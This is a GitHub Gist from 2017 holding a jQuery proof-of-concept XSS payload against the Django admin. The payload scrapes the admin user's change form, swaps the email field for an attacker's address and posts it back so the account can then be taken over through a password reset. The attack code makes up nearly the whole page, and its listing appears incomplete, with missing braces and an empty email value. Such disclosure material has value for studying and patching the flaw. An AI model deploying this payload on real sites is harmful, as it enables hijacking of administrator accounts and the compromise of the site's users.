Skip to content

Instantly share code, notes, and snippets.



Created Feb 15, 2017
What would you like to do?
#poc #django #js #vulnerability
* POC for XSS vulnerability
* Simply parse the change form for the admin user and change the email.
* The attacker needs, after this has run successful, to reset the password using
* the email indicated in the script.
url = '/auth/user/1/change/'
url_reset_passwd = '/password_change/'
evil_email = ''
// get the values
function get_default(idx) {
$element = $(this);
attrname = $element.attr('name');
value = $element.val();
opts[attrname] = value;
// get the editing page
response = $.ajax(url, {
success: function (data, testStatus, xhr){
// this is called when the GET returns with success
function pwn(response) {
$response = $(response)
$form = $($response.find('form')[1])
// fields for POSTing
opts = {}
// with a JQuery magic get the default value
// i'm twelve, what's this?
opts['email'] = evil_email;
// ??? profit
$.post(url, opts)
console.log(' [+] pwned')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.